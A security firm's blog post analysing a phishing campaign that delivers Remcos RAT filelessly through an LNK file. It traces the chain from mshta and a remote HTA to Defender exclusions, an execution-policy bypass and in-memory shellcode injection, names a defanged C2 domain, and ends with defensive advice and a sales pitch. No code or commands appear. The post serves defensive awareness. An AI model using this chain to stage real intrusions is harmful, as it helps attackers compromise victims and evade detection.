The new fileless attack: Remcos RAT delivered via LNK file in a phishing campaign
Introduction
Fileless cyberattacks are becoming increasingly common in today's threat landscape. These attacks execute malicious code directly in system memory, often using legitimate system utilities instead of saving infected files to disk. As a result, fileless malware leaves few traces and frequently evades traditional file-based detection mechanisms.
Simultaneously, recent platform security changes (e.g., Microsoft's blocking of Office macros) have forced criminals to explore new delivery vectors, such as Windows shortcut files (.LNK) attached in phishing emails.
A striking and alarming example of this evolution is a recent phishing campaign uncovered by researchers, where the remote access trojan (RAT) Remcos is distributed in a fileless manner via a malicious LNK file attached to a phishing email. This delivery method combines social engineering with advanced exploitation of legitimate system components, making the attack particularly dangerous. While Remcos RAT has previously appeared in fileless forms—notably in a November 2024 campaign using fake purchase orders and Office exploits—the new LNK-based vector highlights a higher level of sophistication and the need for increased awareness.
The following sections examine in detail who the attackers might be and how they operate, the technical infection chain, what Remcos RAT is and what it can do once infiltrated, the primary victim profiles, how the malware evades detection and persists, and key cybersecurity lessons to draw from this incident. The tone is professional but accessible, aiming to help both everyday users and companies understand the risks and protection strategies.
Who are the attackers and how does the attack work?
While the exact identity of the attackers in this campaign is unknown, the complexity of the operation suggests a well-organized cybercriminal group with financial or espionage motives. Remcos RAT is widely available on underground forums and has been used by various threat actors, from lone hackers to medium-level APT groups. The target appears to be opportunistic—whoever takes the bait—with attackers leveraging timely themes (tax documents) to increase open rates.
Here's how the infection chain unfolds:
- Phishing Email and Malicious LNK File: The victim receives a phishing email with a ZIP archive attachment. Inside the archive is a Windows shortcut file (.LNK), disguised as a legitimate document (e.g., a tax form). Once the user unzips and double-clicks the .LNK file, a chain of malicious commands is triggered.
- Abuse of
mshta.exe: The .LNK file launches the legitimate Windows utilitymshta.exe, used to execute HTML Applications (.HTA files). It points to a remote HTA file hosted on a server controlled by the attacker. - Execution of VBScript in HTA File: The HTA file contains obfuscated VBScript that:
- Adds a public folder to Windows Defender exclusions.
- Sets PowerShell execution policy to Bypass.
- Downloads additional files (a decoy PDF, another HTA file, a PowerShell script).
- Adds a registry key for persistence.
- PowerShell In-Memory Execution: The downloaded PowerShell script is heavily obfuscated and executed with
powershell.exe. It decodes embedded shellcode and injects it into memory using Windows API calls. The final payload, Remcos RAT, is launched directly in memory. - C2 Connection: Once running, Remcos connects to its command-and-control (C2) server to receive commands and exfiltrate data. In this campaign, it used the domain
readysteaurants[.]com.
What is Remcos RAT and what does it do?
Remcos RAT (Remote Control and Surveillance) is a powerful and versatile remote access trojan. Initially marketed as a legitimate remote administration tool, it has been heavily abused by cybercriminals.
Capabilities include:
- System reconnaissance (OS version, IP, hostname, installed software)
- Keylogging (records all keystrokes)
- Clipboard monitoring
- Screenshot capture
- Remote command execution
- Data exfiltration via encrypted TLS channels
Once active, Remcos gives attackers full control over the infected system, including installing additional malware, spying through webcam/microphone (in some variants), and pivoting within networks. It operates silently, with no visible UI, and hides under legitimate process names.
Who are the primary targets?
Targets include both individuals and organizations:
- Individuals: May be tricked by fake tax documents and phishing emails. Risk includes credential theft, financial fraud, or surveillance.
- Organizations: Especially accounting or finance departments handling sensitive documents. Attackers could use initial access for lateral movement, data theft, or launching ransomware.
Motives are primarily financial: stolen data can be sold on the black market or used for fraud.
Evasion and Persistence Techniques
Remcos RAT uses multiple techniques to evade detection and maintain persistence:
- Fileless execution: Shellcode and payload are loaded entirely in memory.
- Living-off-the-land binaries (LOLBins): Uses legitimate tools like
mshta.exe,wscript.exe, andpowershell.exe. - Obfuscation: Scripts and payloads are heavily encoded to avoid signature-based detection.
- Windows Defender evasion: Excludes its working directory from scans.
- Registry persistence: Adds entries to run at startup.
- Encrypted communication: Uses TLS to mask traffic.
These features make detection by traditional AV difficult. Without behavior-based monitoring or endpoint detection and response (EDR), such attacks can go unnoticed.
Cybersecurity Lessons
Key takeaways from this incident:
- User education: Train users to spot phishing emails and suspicious attachments (e.g., .LNK inside ZIP).
- Email filtering: Block risky attachments and scan contents of ZIPs.
- Behavior-based endpoint protection: Use EDR to detect LOLBin abuse or memory injection.
- PowerShell and script monitoring: Log and alert on suspicious script activity.
- Restrict execution of
mshta.exeand similar tools where not needed. - Limit user privileges: Least privilege reduces malware impact.
- Backup and incident response plans: Prepare for rapid isolation and recovery.
Final Thoughts and Call to Action
This campaign shows that modern malware doesn’t need files to be dangerous. Remcos RAT’s fileless delivery and stealthy operation make it a serious threat for users and organizations alike. As attackers evolve, so must our defenses.
At Hack & Fix, we specialize in proactive cybersecurity assessments and custom protection strategies. Don’t wait for an incident to strike
Proactive defense is no longer optional. Stay ahead of the threats. Let Hack & Fix secure your digital environment before it's too late.
You should also read:
The Rising Threat of ClickFix: Why Regular Phishing Exercises and Penetration Testing Are No Longer Optional
A New Era of Social Engineering Attacks In the constantly evolving landscape of cybersecurity threats, a particularly insidious technique has gained alarming traction among the most sophisticated threat actors in the world. According to recent findings from Proofpoint, multiple state-sponsored hacking groups from Iran, North…
Continue reading...
Tata Technologies Hit by Major Ransomware Attack: A Wake-Up Call for Supply Chain Cybersecurity
In a shocking development, Tata Technologies, a leading engineering and technology services firm, has reportedly fallen victim to a significant ransomware attack orchestrated by the notorious Hunters International group. The breach, which came to light in January 2025, has sent ripples across the industrial sector,…
Continue reading...
🚨Phishing Attack Hides JavaScript Using Invisible Unicode Trick
A New Obfuscation Technique is Making Phishing Attacks Harder to Detect Threat actors are constantly evolving their techniques to bypass security defenses, and a recently discovered obfuscation method using invisible Unicode characters has raised concerns in the cybersecurity community. This novel technique enables attackers to…
Continue reading...